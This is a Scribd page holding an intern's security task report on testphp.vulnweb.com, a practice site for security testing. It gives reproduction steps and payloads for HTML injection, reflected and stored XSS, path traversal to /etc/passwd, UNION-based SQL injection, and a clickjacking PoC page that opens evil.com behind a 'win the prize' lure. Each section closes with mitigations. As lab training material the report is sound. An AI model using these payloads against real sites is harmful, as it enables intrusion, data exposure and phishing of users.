Scribd
Upload
6 views16 pages

ShadowFox Tasks (HARD)

The document is a task report by a Cyber Security intern, Manav, detailing various vulnerabilities found on the website http://testphp.vulnweb.com/. It covers six types of vulnerabilities: HTML Injection, Reflected XSS, Stored XSS, File Path Traversal, SQL Injection, and Clickjacking + Open Redirect, along with descriptions, reproduction steps, and mitigations for each. The report emphasizes the importance of input sanitization and implementing security headers to prevent these vulnerabilities.

Uploaded by

mexek14259
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
6 views16 pages

ShadowFox Tasks (HARD)

The document is a task report by a Cyber Security intern, Manav, detailing various vulnerabilities found on the website http://testphp.vulnweb.com/. It covers six types of vulnerabilities: HTML Injection, Reflected XSS, Stored XSS, File Path Traversal, SQL Injection, and Clickjacking + Open Redirect, along with descriptions, reproduction steps, and mitigations for each. The report emphasizes the importance of input sanitization and implementing security headers to prevent these vulnerabilities.

Uploaded by

mexek14259
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 16

CYBER SECURITY INTERN

Task Report

Name : Manav
Domain: Cyber Security
Company: Shadowfox
Level: Hard
Batch: May, 2024
Contents of Hard level:

3 - Vulnerabilities in http://testphp.vulnweb.com/

a - Html Injection
b - Reflected XSS
c - Stored XSS
d - File Path Traversal
e - SQL Injection
f - Clickjacking + Open Redirect

• Description
• Steps to Reproduce
• Mitigations
• Proof of Concept (Screenshots)

--------------------------------------------------------------------------------
A – HTML Injection

Description:
HTML Injection is a security vulnerability that allows an attacker to
inject HTML code into web pages.

Steps to Reproduce :
-> Visit http://testphp.vulnweb.com/
-> At the search bar type this payload <h1>Hacked By Manav</h1>
-> It will be reflected Like this:
-> Now you can also enter this payload if you want this type of result
<!DOCTYPE html> <html> <head> <title>HTML marquee Tag</title>
</head> <body> <marquee>HTML INJECTION POC DONE BY MANAV
</marquee> </body> </html>

Mitigations :
- Input sanitization
- Block special characters like <> / ()
- Implement CSP Header
-------------------------------------------------------------------------------------

B – Reflected XSS
Description:
Reflected XSS is a type of attack where an attacker injects malicious
script and payloads in the websites which is then reflected back to
the user by the web application

Steps to Reproduce :
-> Visit http://testphp.vulnweb.com/
-> At search bar enter this payload
<script>prompt(document.domain)</script>
-> Then the payload will be reflected to you

-> We can also try other payloads like :


<img src=x onerror=prompt(1)>
<img src=any image ink>

-> If we will give any image link in this payload , The image will get
reflected like this

Mitigations :

- Input sanitization
- Block special characters like <> / ()
- Implement CSP Header

C – Stored XSS
Description:
Stored XSS is a type of attack where an attacker injects malicious
script and payloads in the websites which is stored in the database
and executed when users access that...

Steps to Reproduce :
-> Visit http://testphp.vulnweb.com/
-> Navigate to signup page and enter default credentials
-> You will be logged in
-> Enter this payload in the Name and email field and update it
<script>alert(1)</script>
-> It will be stored in database and after that you will get a popup

(as you can see in the Screenshot)


Mitigations :

- Implement CSP header


- Regular security Testing
- Employ automated scanning tools as well as perform manual
testing

-------------------------------------------------------------------------------------

D – File Path Traversal


Description:

File Path Traversal also known as Directory Traversal. It allows


attacker to access files from your web server or application to which
they should not have access.

Steps to Reproduce :

-> Visit http://testphp.vulnweb.com/


-> Navigate to Browse Categories > Posters
-> You will get lot of images | Open the first image in new tab
-> Intercept that request in Burpsuite and Send it to repeater
-> Remove the ./pictures/1.jpg instead of that enter this
Payload ../../etc/passwd
-> You will get to see all the passwords
Mitigations :

- Validate the User Input before processing it


- Files with sensitive information should be Hidden

-------------------------------------------------------------------------------------

E – SQL Injection
Description:

SQL Injection is a type of attack which targets the security of a


Database of a website or a mobile application.
Main Purpose is to replace original parameters with malicious sql
code with results in to expose their design Implementation Flaws...

Steps to Reproduce :

-> Visit http://testphp.vulnweb.com/


-> Navigate to Browse Categories > Stickers
-> http://testphp.vulnweb.com/listproducts.php?cat=3 you will get
this url
-> Simply after 3 enter this payload
union select 1,2,3,4,5,6,7,8,9,10,@@version
-> Hit enter you will get to see the version
Mitigations :

- Secure all field from invalid inputs


- Deploy Firewalls

-------------------------------------------------------------------------------------
F – Clickjacking + Open Redirect

Description:
Clickjacking - It is a Type of malicious method via which an attacker
convinces a user to click on something which can cause to
download malware or to redirect to some malicious websites
(which I have done in this report)...

Open Redirect - An open redirect is a vulnerability found in web


applications where an attacker can redirect users to a malicious
website of their choice.

Steps to Reproduce :

-> Visit http://testphp.vulnweb.com/ | copy the url


-> Navigate to https://clickjacker.io/ | Paste the website url to test
-> You will get to see that this website is vulnerable to clickjacking
attack (But now let’s see how we can chain it with open redirect )
-> Save this HTML File and open it in any browser
<!DOCTYPE html>

<html>

<head>

<style>

iframe{

width: 100%;

height: 585px;

border: none;

</style>

<title>ClickJacking PoC</title>

</head>

<body>

<a onmouseover=window.open("https://evil.com") href="https://evil.com" style="z-


index:1;left:900px;position:relative;top:150px;font-family: Montserrat;font-weight:
800;font-size: 16px;text-transform: uppercase;color:red;text-decoration:none;font-style:
normal;">

click here to win the prize </a>

<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-


scripts"

style="opacity:1"

src="

http://testphp.vulnweb.com/

"></iframe>

</body>

</html>
-> When you will open this file You will get to see website in a frame
and written CLICK HERE TO WIN THE PRIZE

-> So when you will click on Click here to win the prize
-> You will be redirected to evil.com
Mitigations :

- Implement CSP Header


- Set the X-Frame Header to prevent the webpage from being
loaded in the frame

-------------------------------------------------------------------------------------
--

You might also like